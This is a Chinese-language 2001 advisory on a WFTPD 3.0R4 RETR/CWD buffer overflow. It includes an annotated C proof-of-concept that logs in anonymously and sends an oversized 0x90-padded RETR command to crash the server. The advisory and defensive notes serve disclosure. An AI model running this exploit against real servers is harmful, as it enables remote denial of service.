WFTPD 'RETR' 和 'CWD'存在缓冲溢出漏洞发布时间:2001-04-27 更新时间:2001-04-27 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Texas Imperial Software WFTPD 3.0R4详细描述 对'RETR'或者'CWD'命令发送不合法的超长的字符串,可以导致WFTPD 服务程序崩溃,并可能导致攻击者执行任意代码。 测试代码
/* WFTPD Pro 3.00 R4 Buffer Overflow exploit written by Len Budney */
/*
 * Test program for the advisory above. It opens an FTP control connection,
 * logs in as "anonymous" with an empty password, and sends one command line
 * made of CMD followed by 0x90 filler bytes up to BUFSIZE. The buffer holds
 * nothing but the command, the filler and CRLF, so what it demonstrates is
 * the oversized-argument condition the advisory files under "input
 * validation error".
 *
 * For defenders: on the wire this is a single FTP command line of BUFSIZE
 * (32774) bytes. A length bound on command arguments in the server, or a
 * command-length rule on a proxy or IDS in front of it, is the control that
 * addresses this class of request.
 *
 * NOTE(review): <string.h> (memset, strlen) and <arpa/inet.h> (inet_addr)
 * are not included, so those calls rely on implicit declarations.
 */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

/* Size of all three buffers below, and the byte count passed to send() for the long command. */
#define BUFSIZE 32774
#define CMD "RETR " /* Alt: use "CWD " and set OFFSET to 4. */
/* Length of CMD; index in exploitbuffer where the filler starts. */
#define OFFSET 5

/* NOTE(review): standard C expects `int main(void)`; `void main()` is a compiler extension. */
void main(){
    int sockfd, s;
    struct sockaddr_in victim;
    char buffer[BUFSIZE];
    /* Starts with CMD; the remaining bytes are zero-initialised. */
    char exploitbuffer[BUFSIZE]={CMD};
    char recvbuffer[BUFSIZE];

    sockfd=socket(AF_INET,SOCK_STREAM,0);
    /* NOTE(review): the failure is reported but execution continues with sockfd == -1. */
    if(sockfd == -1)perror("socket");

    victim.sin_family=AF_INET;
    /* Hard-coded private (RFC 1918) address, presumably the author's lab host. */
    victim.sin_addr.s_addr=inet_addr("192.168.197.129");
    /* Port 21: FTP control channel. */
    victim.sin_port=htons(21);

    s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim));
    /* NOTE(review): as above, a failed connect is only reported; the send/recv calls still run. */
    if(s == -1) perror("connect");

    /* Read the server greeting, then discard it; reply codes are never inspected. */
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));

    /* Anonymous login: USER, then PASS with no password argument. */
    send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0);
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));

    send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0);
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));

    /*
     * Fill indices OFFSET .. BUFSIZE-3 with 0x90. The last two bytes stay
     * zero, so exploitbuffer is still NUL-terminated with length BUFSIZE-2.
     */
    memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2);
    /*
     * NOTE(review): BUFSIZE-2 characters plus "\r\n" plus the terminating NUL
     * is BUFSIZE+1 bytes, so this unbounded sprintf writes one byte past the
     * end of `buffer` (undefined behaviour in the test program itself).
     */
    sprintf(buffer,"%s\r\n",exploitbuffer);
    /* Sends all BUFSIZE bytes: CMD, the filler and the trailing CRLF. */
    send(sockfd, buffer , sizeof(buffer),0);
    /* Return value unchecked, so the program cannot tell a reply from a dropped connection. */
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);

    close(sockfd);
    /* Exit status is 0 whether or not any earlier call failed. */
    _exit(0);
}
解决方案 尚无 相关信息 |